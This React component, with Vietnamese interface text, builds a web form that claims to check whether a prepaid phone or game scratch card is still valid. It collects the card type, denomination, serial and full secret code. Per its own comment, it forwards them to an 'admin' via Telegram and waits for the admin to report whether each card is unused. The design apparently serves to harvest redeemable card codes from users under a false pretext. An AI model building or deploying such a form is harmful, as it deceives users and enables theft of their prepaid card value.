import React, { useState } from 'react';
import './CardForm.css';

const CardForm = () => {
  const [formData, setFormData] = useState({
    cardType: 'viettel',
    amount: '10000',
    cardCode: '',
    serial: ''
  });
  const [loading, setLoading] = useState(false);
  const [waitingForAdmin, setWaitingForAdmin] = useState(false);
  const [currentTransactionId, setCurrentTransactionId] = useState(null);
  const [message, setMessage] = useState({ type: '', text: '' });
  const [validationErrors, setValidationErrors] = useState({ serial: '', cardCode: '' });

  const cardTypes = [
    { value: 'viettel', label: 'Viettel' },
    { value: 'vinaphone', label: 'Vinaphone' },
    { value: 'mobifone', label: 'Mobifone' },
    { value: 'vietnamobile', label: 'Vietnamobile' },
    { value: 'itel', label: 'iTel' },
    { value: 'zing', label: 'Zing' },
    { value: 'garena', label: 'Garena' },
    { value: 'vcoin', label: 'Vcoin' }
  ];

  // Mệnh giá chuẩn cho hầu hết các loại thẻ
  const standardAmounts = [
    { value: '10000', label: '10,000 VNĐ' },
    { value: '20000', label: '20,000 VNĐ' },
    { value: '30000', label: '30,000 VNĐ' },
    { value: '50000', label: '50,000 VNĐ' },
    { value: '100000', label: '100,000 VNĐ' },
    { value: '200000', label: '200,000 VNĐ' },
    { value: '500000', label: '500,000 VNĐ' }
  ];

  // Mệnh giá cho thẻ Zing (có thêm 1 triệu)
  const zingAmounts = [
    { value: '10000', label: '10,000 VNĐ' },
    { value: '20000', label: '20,000 VNĐ' },
    { value: '30000', label: '30,000 VNĐ' },
    { value: '50000', label: '50,000 VNĐ' },
    { value: '100000', label: '100,000 VNĐ' },
    { value: '200000', label: '200,000 VNĐ' },
    { value: '500000', label: '500,000 VNĐ' },
    { value: '1000000', label: '1,000,000 VNĐ' }
  ];

  // Hàm lấy danh sách mệnh giá theo loại thẻ
  const getAmountsByCardType = (cardType) => {
    return cardType === 'zing' ? zingAmounts : standardAmounts;
  };

  // Lấy danh sách mệnh giá hiện tại
  const currentAmounts = getAmountsByCardType(formData.cardType);

  // Hàm tạo placeholder text cho mã thẻ
  const getCodePlaceholder = (cardType) => {
    const format = cardFormats[cardType];
    if (!format) return 'Nhập mã thẻ';

    const alphanumericCards = ['zing', 'vcoin'];
    const isAlphanumeric = alphanumericCards.includes(cardType);
    const unit = isAlphanumeric ? 'ký tự' : 'số';

    if (format.codeMinLength) {
      return `Nhập ${format.codeMinLength}-${format.codeLength} ${unit}`;
    }
    return `Nhập ${format.codeLength} ${unit}`;
  };

  // Định nghĩa format cho từng loại thẻ
  const cardFormats = {
    // Viettel: Serial 14 số → Code 15 số (định dạng mới)
    // Lưu ý: Thẻ cũ có Serial 11 → Code 13
    viettel: { codeLength: 15, serialLength: 14 },

    // Vinaphone: Serial 14 số, Code 12-14 số
    vinaphone: { codeLength: 14, serialLength: 14, codeMinLength: 12 },

    // Mobifone: Serial 15 số, Code 12 số
    mobifone: { codeLength: 12, serialLength: 15 },

    vietnamobile: { codeLength: 14, serialLength: 14 },
    itel: { codeLength: 15, serialLength: 14 },

    // Zing: Code 9 ký tự (chữ+số), Serial 12 ký tự (chữ+số)
    zing: { codeLength: 9, serialLength: 12 },

    // Garena: Code 16 số, Serial 8 số
    garena: { codeLength: 16, serialLength: 8 },

    // Vcoin: Code 10-12 ký tự (chữ+số), Serial 12-14 số
    vcoin: { codeLength: 11, serialLength: 13 }
  };

  // Hàm validate format thẻ
  const validateCardFormat = (cardType, serial, cardCode) => {
    const errors = { serial: '', cardCode: '' };
    const format = cardFormats[cardType];

    if (!format) return errors;

    // Các loại thẻ cho phép chữ và số (alphanumeric)
    const alphanumericCards = ['zing', 'vcoin'];

    // Validate serial
    if (serial) {
      // Zing serial có thể bắt đầu bằng chữ cái
      if (cardType === 'zing') {
        if (!/^[a-zA-Z0-9]+$/.test(serial)) {
          errors.serial = 'Serial chỉ được chứa chữ và số';
        } else if (serial.length !== format.serialLength) {
          errors.serial = `Serial phải có đúng ${format.serialLength} ký tự`;
        }
      } else {
        // Các loại thẻ khác: serial chỉ chứa số
        if (!/^\d+$/.test(serial)) {
          errors.serial = 'Serial chỉ được chứa số';
        } else if (serial.length !== format.serialLength) {
          errors.serial = `Serial phải có đúng ${format.serialLength} số`;
        }
      }
    }

    // Validate card code
    if (cardCode) {
      // Zing, Vcoin: cho phép alphanumeric
      if (alphanumericCards.includes(cardType)) {
        if (!/^[a-zA-Z0-9]+$/.test(cardCode)) {
          errors.cardCode = 'Mã thẻ chỉ được chứa chữ và số';
        } else if (cardCode.length !== format.codeLength) {
          errors.cardCode = `Mã thẻ phải có đúng ${format.codeLength} ký tự`;
        }
      } else {
        // Các loại thẻ khác: mã thẻ chỉ chứa số
        if (!/^\d+$/.test(cardCode)) {
          errors.cardCode = 'Mã thẻ chỉ được chứa số';
        } else {
          // Kiểm tra độ dài - hỗ trợ range cho một số loại thẻ
          if (format.codeMinLength) {
            // Thẻ có range (VD: Vinaphone 12-14 số)
            if (cardCode.length < format.codeMinLength || cardCode.length > format.codeLength) {
              errors.cardCode = `Mã thẻ phải có ${format.codeMinLength}-${format.codeLength} số`;
            }
          } else {
            // Thẻ có độ dài cố định
            if (cardCode.length !== format.codeLength) {
              errors.cardCode = `Mã thẻ phải có đúng ${format.codeLength} số`;
            }
          }
        }
      }
    }

    return errors;
  };

  const handleChange = (e) => {
    const { name, value } = e.target;
    let newFormData = {
      ...formData,
      [name]: value
    };

    // Khi đổi loại thẻ, reset mệnh giá nếu mệnh giá hiện tại không có trong loại thẻ mới
    if (name === 'cardType') {
      const newAmounts = getAmountsByCardType(value);
      const isAmountAvailable = newAmounts.some(amt => amt.value === formData.amount);

      if (!isAmountAvailable) {
        // Reset về mệnh giá đầu tiên nếu mệnh giá hiện tại không khả dụng
        newFormData.amount = newAmounts[0].value;
      }
    }

    setFormData(newFormData);
    setMessage({ type: '', text: '' });

    // Validate khi user nhập serial hoặc cardCode
    if (name === 'serial' || name === 'cardCode' || name === 'cardType') {
      const errors = validateCardFormat(
        newFormData.cardType,
        newFormData.serial,
        newFormData.cardCode
      );
      setValidationErrors(errors);
    }
  };

  const handleCancel = () => {
    setWaitingForAdmin(false);
    setCurrentTransactionId(null);
    setLoading(false);
    setMessage({ type: 'info', text: 'Đã hủy yêu cầu kiểm tra thẻ.' });
  };

  const handleSubmit = async (e) => {
    e.preventDefault();

    if (!formData.cardCode || !formData.serial) {
      setMessage({ type: 'error', text: 'Vui lòng nhập đầy đủ thông tin thẻ cào!' });
      return;
    }

    // Kiểm tra validation
    const errors = validateCardFormat(formData.cardType, formData.serial, formData.cardCode);
    if (errors.serial || errors.cardCode) {
      setValidationErrors(errors);
      setMessage({ type: 'error', text: 'Vui lòng kiểm tra lại thông tin thẻ cào!' });
      return;
    }

    setLoading(true);
    setMessage({ type: '', text: '' });

    try {
      // Import services
      const { checkCard, pollTransactionStatus } = await import('../services/apiService');

      // Gửi thông tin thẻ đến admin qua Telegram
      setMessage({ type: 'info', text: '⏳ Đang gửi yêu cầu...' });
      const result = await checkCard(formData);

      if (!result.success) {
        setMessage({ type: 'error', text: result.message || 'Không thể gửi yêu cầu!' });
        setLoading(false);
        return;
      }

      // Đã gửi thành công, chuyển sang trạng thái waiting
      setLoading(false);
      setWaitingForAdmin(true);
      setCurrentTransactionId(result.transactionId);
      setMessage({
        type: 'info',
        text: '📱 Đã gửi đến admin! Vui lòng chờ xác nhận ...'
      });

      // Bắt đầu polling để chờ admin xác nhận
      const finalResult = await pollTransactionStatus(
        result.transactionId,
        (transaction) => {
          // Callback được gọi mỗi khi có update
          if (transaction.status === 'pending') {
            setMessage({
              type: 'info',
              text: '📱 Đang chờ xác nhận ...'
            });
          }
        },
        150, // Max 60 lần retry (2 phút)
        2000 // Check mỗi 2 giây
      );

      // Kết thúc trạng thái waiting
      setWaitingForAdmin(false);
      setCurrentTransactionId(null);

      // Xử lý kết quả cuối cùng
      if (finalResult.status === 'unused') {
        // Thẻ chưa sử dụng
        setMessage({
          type: 'success',
          text: `✅ Thẻ ${formData.serial} chưa được sử dụng`
        });
      } else if (finalResult.status === 'invalid') {
        // Thẻ sai định dạng
        setMessage({
          type: 'error',
          text: `❌ Thẻ ${formData.serial} sai định dạng`
        });
      } else if (finalResult.status === 'used') {
        // Thẻ đã được sử dụng
        setMessage({
          type: 'error',
          text: `🚫 Thẻ ${formData.serial} đã được sử dụng`
        });
      } else if (finalResult.status === 'timeout') {
        // Timeout
        setMessage({
          type: 'error',
          text: '⏱️ Hết thời gian chờ. Admin chưa xác nhận.'
        });
      } else {
        // Lỗi khác
        setMessage({
          type: 'error',
          text: finalResult.message || 'Có lỗi xảy ra!'
        });
      }

      // Reset form nếu thành công
      if (finalResult.status === 'unused') {
        setTimeout(() => {
          setFormData({
            cardType: 'viettel',
            amount: '10000',
            cardCode: '',
            serial: ''
          });
          setValidationErrors({ serial: '', cardCode: '' });
        }, 2000);
      }

    } catch (error) {
      setWaitingForAdmin(false);
      setCurrentTransactionId(null);
      setMessage({
        type: 'error',
        text: error.message || 'Có lỗi xảy ra! Vui lòng thử lại sau.'
      });
    } finally {
      setLoading(false);
    }
  };

  return (
    <div className="card-form-container">
      <div className="card-form-wrapper">
        <div className="form-header">
          <h1>Kiểm Tra Thẻ Cào Điện Thoại</h1>
          <p>Nhập thông tin thẻ cào để kiểm tra nhanh chóng</p>
        </div>

        <form onSubmit={handleSubmit} className="card-form">
          <div className="form-group">
            <label htmlFor="cardType">Loại thẻ</label>
            <select
              id="cardType"
              name="cardType"
              value={formData.cardType}
              onChange={handleChange}
              className="form-control"
              disabled={loading}
            >
              {cardTypes.map(type => (
                <option key={type.value} value={type.value}>
                  {type.label}
                </option>
              ))}
            </select>
          </div>

          <div className="form-group">
            <label htmlFor="amount">Mệnh giá</label>
            <select
              id="amount"
              name="amount"
              value={formData.amount}
              onChange={handleChange}
              className="form-control"
              disabled={loading}
            >
              {currentAmounts.map(amount => (
                <option key={amount.value} value={amount.value}>
                  {amount.label}
                </option>
              ))}
            </select>
          </div>

          <div className="form-group">
            <label htmlFor="serial">Số serial</label>
            <input
              type="text"
              id="serial"
              name="serial"
              value={formData.serial}
              onChange={handleChange}
              placeholder={`Nhập ${cardFormats[formData.cardType].serialLength} số`}
              className={`form-control ${validationErrors.serial ? 'input-error' : ''}`}
              disabled={loading}
              maxLength={cardFormats[formData.cardType].serialLength}
            />
            {validationErrors.serial && (
              <span className="error-text">{validationErrors.serial}</span>
            )}
          </div>

          <div className="form-group">
            <label htmlFor="cardCode">Mã thẻ</label>
            <input
              type="text"
              id="cardCode"
              name="cardCode"
              value={formData.cardCode}
              onChange={handleChange}
              placeholder={getCodePlaceholder(formData.cardType)}
              className={`form-control ${validationErrors.cardCode ? 'input-error' : ''}`}
              disabled={loading}
              maxLength={cardFormats[formData.cardType].codeLength}
            />
            {validationErrors.cardCode && (
              <span className="error-text">{validationErrors.cardCode}</span>
            )}
          </div>

          {message.text && (
            <div className={`message message-${message.type}`}>
              {message.text}
            </div>
          )}

          {waitingForAdmin && currentTransactionId && (
            <div className="waiting-status">
              <div className="waiting-info">
                <span className="waiting-icon">⏳</span>
                <div className="waiting-text">
                  <strong>Đang chờ xác nhận </strong>
                  <small>Mã giao dịch: {currentTransactionId.split('_')[1]}</small>
                </div>
              </div>
              <button
                type="button"
                className="cancel-btn"
                onClick={handleCancel}
              >
                Hủy
              </button>
            </div>
          )}

          <div className="form-actions">
            <button
              type="submit"
              className="submit-btn"
              disabled={loading || waitingForAdmin}
            >
              {loading ? 'Đang gửi...' : 'Kiểm tra'}
            </button>
          </div>
        </form>

        <div className="form-footer">
          <p>Lưu ý: Vui lòng kiểm tra kỹ thông tin trước khi gửi</p>

          <details className="error-guide">
            <summary>❓ Các lỗi thường gặp</summary>
            <div className="error-guide-content">
              <h4>🔴 Thẻ không hợp lệ hoặc đã sử dụng:</h4>
              <ul>
                <li>Thẻ đã được sử dụng trước đó</li>
                <li>Serial hoặc mã thẻ bị gõ sai</li>
                <li>Thẻ giả hoặc không hợp lệ</li>
              </ul>

              <h4>🔴 Sai mệnh giá:</h4>
              <ul>
                <li>Mệnh giá thực tế của thẻ khác với mệnh giá đã chọn</li>
                <li>Vui lòng kiểm tra lại mệnh giá in trên thẻ</li>
              </ul>
            </div>
          </details>
        </div>
      </div>
    </div>
  );
};

export default CardForm;
